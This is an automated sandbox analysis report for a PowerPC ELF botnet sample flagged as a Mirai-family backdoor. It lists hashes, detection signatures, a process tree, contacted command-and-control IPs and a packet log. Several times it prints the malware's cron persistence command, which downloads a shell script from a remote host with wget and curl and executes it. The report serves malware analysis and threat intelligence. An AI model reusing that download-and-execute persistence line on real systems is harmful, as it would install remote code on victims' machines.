Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
ppc.elf

Overview

General Information

Sample name:ppc.elf
Analysis ID:1557034
MD5:c6f057c974b24f6abdac5b76b10040b9
SHA1:80295c6fdf8fff202829732e58428d656b38f6bd
SHA256:4e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1557034
Start date and time:2024-11-17 05:37:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ppc.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@74/0
Command:/tmp/ppc.elf
PID:6232
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • ppc.elf (PID: 6232, Parent: 6156, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/ppc.elf
    • ppc.elf New Fork (PID: 6234, Parent: 6232)
    • sh (PID: 6234, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6240, Parent: 6234)
        • sh New Fork (PID: 6242, Parent: 6240)
        • crontab (PID: 6242, Parent: 6240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6241, Parent: 6234)
      • crontab (PID: 6241, Parent: 6234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • ppc.elf New Fork (PID: 6243, Parent: 6232)
      • ppc.elf New Fork (PID: 6294, Parent: 6243)
      • ppc.elf New Fork (PID: 6298, Parent: 6243)
    • ppc.elf New Fork (PID: 6245, Parent: 6232)
    • ppc.elf New Fork (PID: 6255, Parent: 6232)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ppc.elfReversingLabs: Detection: 15%
Source: tmp.mMQot8.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 5.39.254.71 ports 17443,19337,1,3,7,9
Source: global trafficTCP traffic: 217.28.130.41 ports 8375,1,2,3,6,22361
Source: global trafficTCP traffic: 193.233.193.45 ports 20243,0,2,2645,3,4,9559
Source: global trafficTCP traffic: 27.102.118.111 ports 0,3,3806,6,8,5448
Source: global trafficTCP traffic: 107.189.8.204 ports 0,1,2,3,7,10732,9805
Source: global trafficTCP traffic: 91.149.238.18 ports 1919,0,4,5,5940,9
Source: global trafficTCP traffic: 192.168.2.23:44314 -> 91.149.218.232:19337
Source: global trafficTCP traffic: 192.168.2.23:33870 -> 5.39.254.71:19337
Source: global trafficTCP traffic: 192.168.2.23:57478 -> 107.189.8.204:10732
Source: global trafficTCP traffic: 192.168.2.23:33644 -> 91.149.238.18:5940
Source: global trafficTCP traffic: 192.168.2.23:35430 -> 45.147.200.148:1593
Source: global trafficTCP traffic: 192.168.2.23:33724 -> 194.87.30.79:8994
Source: global trafficTCP traffic: 192.168.2.23:38800 -> 194.58.66.244:5859
Source: global trafficTCP traffic: 192.168.2.23:41734 -> 27.102.118.110:21211
Source: global trafficTCP traffic: 192.168.2.23:48800 -> 31.13.248.13:19943
Source: global trafficTCP traffic: 192.168.2.23:60298 -> 31.13.248.89:6968
Source: global trafficTCP traffic: 192.168.2.23:48676 -> 195.133.53.106:7149
Source: global trafficTCP traffic: 192.168.2.23:53580 -> 193.233.193.45:20243
Source: global trafficTCP traffic: 192.168.2.23:41898 -> 209.141.49.186:5268
Source: global trafficTCP traffic: 192.168.2.23:47098 -> 45.140.168.235:7894
Source: global trafficTCP traffic: 192.168.2.23:42236 -> 217.28.130.41:22361
Source: global trafficTCP traffic: 192.168.2.23:43756 -> 86.107.100.80:22606
Source: global trafficTCP traffic: 192.168.2.23:41148 -> 89.32.41.42:19303
Source: global trafficTCP traffic: 192.168.2.23:47094 -> 213.182.204.57:19113
Source: global trafficTCP traffic: 192.168.2.23:57666 -> 27.102.118.111:3806
Source: global trafficTCP traffic: 192.168.2.23:59544 -> 209.141.61.182:5787
Source: /tmp/ppc.elf (PID: 6232)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknownTCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknownTCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknownTCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknownTCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknownTCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknownTCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknownTCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknownTCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknownTCP traffic detected without corresponding DNS query: 194.58.66.244
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.mMQot8.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@74/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6242)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6241)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6241)File: /var/spool/cron/crontabs/tmp.mMQot8Jump to behavior
Source: /usr/bin/crontab (PID: 6241)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6065/cmdlineJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6373/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6384/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6372/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6383/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6375/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6374/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6385/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6355/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6377/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6376/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6368/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6379/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6367/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6378/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6380/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6371/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6382/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6370/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6381/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6336/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6294)File opened: /proc/6369/statusJump to behavior
Source: /tmp/ppc.elf (PID: 6234)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/ppc.elf (PID: 6232)Queries kernel information via 'uname': Jump to behavior
Source: ppc.elf, 6232.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6243.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6245.1.0000562348aeb000.0000562348bc0000.rw-.sdmpBinary or memory string: !/etc/qemu-binfmt/ppc1
Source: ppc.elf, 6232.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6243.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6245.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc/tmp/ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ppc.elf
Source: ppc.elf, 6232.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6243.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6245.1.0000562348aeb000.0000562348bc0000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc
Source: ppc.elf, 6232.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6243.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6245.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557034 Sample: ppc.elf Startdate: 17/11/2024 Architecture: LINUX Score: 60 34 107.189.8.204, 10732, 35914, 57478 PONYNETUS United States 2->34 36 91.149.238.18, 1919, 33644, 53870 MARTON-ASPL Poland 2->36 38 22 other IPs or domains 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 ppc.elf 2->9         started        signatures3 process4 process5 11 ppc.elf sh 9->11         started        13 ppc.elf 9->13         started        15 ppc.elf 9->15         started        17 ppc.elf 9->17         started        process6 19 sh crontab 11->19         started        23 sh 11->23         started        25 ppc.elf 13->25         started        27 ppc.elf 13->27         started        file7 32 /var/spool/cron/crontabs/tmp.mMQot8, ASCII 19->32 dropped 44 Sample tries to persist itself using cron 19->44 46 Executes the "crontab" command typically for achieving persistence 19->46 29 sh crontab 23->29         started        signatures8 process9 signatures10 48 Executes the "crontab" command typically for achieving persistence 29->48
SourceDetectionScannerLabelLink
ppc.elf16%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
unknown
unknownfalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.mMQot8.18.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      217.28.130.41
      unknownUnited Kingdom
      15839COBWEB-NETGBtrue
      194.58.66.244
      unknownRussian Federation
      2118RELCOM-ASRelcomGroup19022019RUfalse
      194.87.30.79
      unknownRussian Federation
      2118RELCOM-ASRelcomGroup19022019RUfalse
      213.182.204.57
      unknownLatvia
      9009M247GBfalse
      27.102.118.110
      unknownKorea Republic of
      45996GNJ-AS-KRDAOUTECHNOLOGYKRfalse
      193.233.193.45
      unknownRussian Federation
      2895FREE-NET-ASFREEnetEUtrue
      27.102.118.111
      unknownKorea Republic of
      45996GNJ-AS-KRDAOUTECHNOLOGYKRtrue
      31.13.248.89
      unknownBulgaria
      34224NETERRA-ASBGfalse
      86.107.100.80
      unknownRomania
      38995AMG-ASROfalse
      195.133.53.106
      unknownRussian Federation
      21453FLEX-ASRUfalse
      91.149.238.18
      unknownPoland
      41952MARTON-ASPLtrue
      45.147.200.148
      unknownRussian Federation
      51659ASBAXETRUfalse
      45.140.168.235
      unknownRussian Federation
      51659ASBAXETRUfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      5.39.254.71
      unknownUnited Kingdom
      30938ABSTATIONwwwabstationnetGBtrue
      209.141.61.182
      unknownUnited States
      53667PONYNETUSfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      91.149.218.232
      unknownPoland
      198401GECKONET-ASPLfalse
      31.13.248.13
      unknownBulgaria
      34224NETERRA-ASBGfalse
      107.189.8.204
      unknownUnited States
      53667PONYNETUStrue
      209.141.49.186
      unknownUnited States
      53667PONYNETUSfalse
      89.32.41.42
      unknownRomania
      48874HOSTMAZEHOSTMAZEROfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      217.28.130.41mpsl.elfGet hashmaliciousUnknownBrowse
        arm5.elfGet hashmaliciousUnknownBrowse
          ppc.elfGet hashmaliciousUnknownBrowse
            harm4.elfGet hashmaliciousUnknownBrowse
              harm5.elfGet hashmaliciousUnknownBrowse
                nsharm.elfGet hashmaliciousUnknownBrowse
                  nshppc.elfGet hashmaliciousUnknownBrowse
                    nshmips.elfGet hashmaliciousUnknownBrowse
                      harm4.elfGet hashmaliciousUnknownBrowse
                        mpsl.elfGet hashmaliciousUnknownBrowse
                          194.58.66.244hmips.elfGet hashmaliciousUnknownBrowse
                            194.87.30.79hmips.elfGet hashmaliciousUnknownBrowse
                              213.182.204.57hmips.elfGet hashmaliciousUnknownBrowse
                                mips.elfGet hashmaliciousUnknownBrowse
                                  arm7.elfGet hashmaliciousUnknownBrowse
                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                      nshmips.elfGet hashmaliciousUnknownBrowse
                                        harm5.elfGet hashmaliciousUnknownBrowse
                                          mpsl.elfGet hashmaliciousUnknownBrowse
                                            arm5.elfGet hashmaliciousUnknownBrowse
                                              arm4.elfGet hashmaliciousUnknownBrowse
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                  193.233.193.45hmips.elfGet hashmaliciousUnknownBrowse
                                                    arm7.elfGet hashmaliciousUnknownBrowse
                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                        harm5.elfGet hashmaliciousUnknownBrowse
                                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                                            nsharm5.elfGet hashmaliciousUnknownBrowse
                                                              nsharm.elfGet hashmaliciousUnknownBrowse
                                                                nshppc.elfGet hashmaliciousUnknownBrowse
                                                                  nshmips.elfGet hashmaliciousUnknownBrowse
                                                                    arm7.elfGet hashmaliciousUnknownBrowse
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      M247GBhmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 213.182.204.57
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 45.61.128.74
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 45.61.128.74
                                                                      yhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                                      • 91.202.233.18
                                                                      meerkat.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 38.201.237.116
                                                                      botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 38.207.55.160
                                                                      mips.elfGet hashmaliciousUnknownBrowse
                                                                      • 213.182.204.57
                                                                      arm7.elfGet hashmaliciousUnknownBrowse
                                                                      • 213.182.204.57
                                                                      bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                      • 45.88.100.118
                                                                      sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 38.206.146.185
                                                                      RELCOM-ASRelcomGroup19022019RUhmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 194.87.30.79
                                                                      Supply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 194.58.83.68
                                                                      lchs.exeGet hashmaliciousQuasarBrowse
                                                                      • 193.124.33.141
                                                                      jKira.armGet hashmaliciousMiraiBrowse
                                                                      • 195.133.54.44
                                                                      GNJ-AS-KRDAOUTECHNOLOGYKRsh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 14.129.24.157
                                                                      nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 1.18.64.186
                                                                      arm5.elfGet hashmaliciousMiraiBrowse
                                                                      • 1.17.85.123
                                                                      sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 1.17.85.151
                                                                      x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 115.71.116.179
                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 27.102.158.214
                                                                      botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 27.103.206.241
                                                                      czHBnd67gp.elfGet hashmaliciousUnknownBrowse
                                                                      • 1.17.85.185
                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 27.103.36.59
                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 1.17.37.240
                                                                      RELCOM-ASRelcomGroup19022019RUhmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 194.87.30.79
                                                                      Supply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 194.58.83.68
                                                                      lchs.exeGet hashmaliciousQuasarBrowse
                                                                      • 193.124.33.141
                                                                      jKira.armGet hashmaliciousMiraiBrowse
                                                                      • 195.133.54.44
                                                                      COBWEB-NETGBmpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      arm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      ppc.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      nsharm.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      nshppc.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      nshmips.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                      • 217.28.130.41
                                                                      No context
                                                                      No context
                                                                      Process:/usr/bin/crontab
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):306
                                                                      Entropy (8bit):5.175269048372245
                                                                      Encrypted:false
                                                                      SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQpZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJovc:8QjHig8PeHLUHYC+GABjnOGAFkz
                                                                      MD5:085E162608B96E698756F196C4E79DEA
                                                                      SHA1:618E3D80363A8F4952189EFE6D9C853EA13F3510
                                                                      SHA-256:203117181E74E7106DC73B5494AEB2A39B96E5742FB1B7585CE87C9D5D2943B7
                                                                      SHA-512:5E8B2EF917CC56831C36B858624FA7F1EE42F51582A866D945BC3A21A3D1D25BC6A0671132C18A220221F218D9E937704D38DD9C9CA6075E067319341D7A23E5
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Nov 16 22:37:54 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                      File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                                      Entropy (8bit):6.263720563579231
                                                                      TrID:
                                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                      File name:ppc.elf
                                                                      File size:77'536 bytes
                                                                      MD5:c6f057c974b24f6abdac5b76b10040b9
                                                                      SHA1:80295c6fdf8fff202829732e58428d656b38f6bd
                                                                      SHA256:4e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
                                                                      SHA512:23a3bda5842b7e4e0abb6601c5c692d88ebe70c9ebe292d58ee5731aa34647b277ba46b893bcc2481be510442170118e29294a604c6ec296a2712316d09261e6
                                                                      SSDEEP:1536:/N1w60+jmqw2+GsHimydhuYmXHeWOaIq1+Vrq/bki8:/g60L6hlE1HeWlIjC8
                                                                      TLSH:B3734B42B30C0947C1A75DF03A3F17D093BEAA9121E4F784655FAB4A92B6E321586FCD
                                                                      File Content Preview:.ELF...........................4..-......4. ...(......................)...)...............)...)...).......T.........dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........-$..../...@..\?.....)4.+../...A..$8...})....)4N..

                                                                      ELF header

                                                                      Class:ELF32
                                                                      Data:2's complement, big endian
                                                                      Version:1 (current)
                                                                      Machine:PowerPC
                                                                      Version Number:0x1
                                                                      Type:EXEC (Executable file)
                                                                      OS/ABI:UNIX - System V
                                                                      ABI Version:0
                                                                      Entry Point Address:0x100001f0
                                                                      Flags:0x0
                                                                      ELF Header Size:52
                                                                      Program Header Offset:52
                                                                      Program Header Size:32
                                                                      Number of Program Headers:3
                                                                      Section Header Offset:77056
                                                                      Section Header Size:40
                                                                      Number of Section Headers:12
                                                                      Header String Table Index:11
                                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                      NULL0x00x00x00x00x0000
                                                                      .initPROGBITS0x100000940x940x240x00x6AX004
                                                                      .textPROGBITS0x100000b80xb80x10df00x00x6AX004
                                                                      .finiPROGBITS0x10010ea80x10ea80x200x00x6AX004
                                                                      .rodataPROGBITS0x10010ec80x10ec80x1a4c0x00x2A008
                                                                      .ctorsPROGBITS0x100229180x129180x80x00x3WA004
                                                                      .dtorsPROGBITS0x100229200x129200x80x00x3WA004
                                                                      .dataPROGBITS0x100229300x129300x3440x00x3WA008
                                                                      .sdataPROGBITS0x10022c740x12c740x400x00x3WA004
                                                                      .sbssNOBITS0x10022cb40x12cb40x700x00x3WA004
                                                                      .bssNOBITS0x10022d240x12cb40x508c0x00x3WA004
                                                                      .shstrtabSTRTAB0x00x12cb40x4b0x00x0001
                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                      LOAD0x00x100000000x100000000x129140x129146.30360x5R E0x10000.init .text .fini .rodata
                                                                      LOAD0x129180x100229180x100229180x39c0x54983.02820x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 17, 2024 05:37:58.682070971 CET42836443192.168.2.2391.189.91.43
                                                                      Nov 17, 2024 05:37:59.453969002 CET4251680192.168.2.23109.202.202.202
                                                                      Nov 17, 2024 05:38:11.197628021 CET4431419337192.168.2.2391.149.218.232
                                                                      Nov 17, 2024 05:38:11.202677965 CET193374431491.149.218.232192.168.2.23
                                                                      Nov 17, 2024 05:38:11.202759981 CET4431419337192.168.2.2391.149.218.232
                                                                      Nov 17, 2024 05:38:11.202855110 CET4431419337192.168.2.2391.149.218.232
                                                                      Nov 17, 2024 05:38:11.207757950 CET193374431491.149.218.232192.168.2.23
                                                                      Nov 17, 2024 05:38:11.207813978 CET4431419337192.168.2.2391.149.218.232
                                                                      Nov 17, 2024 05:38:11.212697983 CET193374431491.149.218.232192.168.2.23
                                                                      Nov 17, 2024 05:38:11.443178892 CET3387019337192.168.2.235.39.254.71
                                                                      Nov 17, 2024 05:38:11.448139906 CET19337338705.39.254.71192.168.2.23
                                                                      Nov 17, 2024 05:38:11.448194981 CET3387019337192.168.2.235.39.254.71
                                                                      Nov 17, 2024 05:38:11.448296070 CET3387019337192.168.2.235.39.254.71
                                                                      Nov 17, 2024 05:38:11.453114986 CET19337338705.39.254.71192.168.2.23
                                                                      Nov 17, 2024 05:38:11.453171015 CET3387019337192.168.2.235.39.254.71
                                                                      Nov 17, 2024 05:38:11.458058119 CET19337338705.39.254.71192.168.2.23
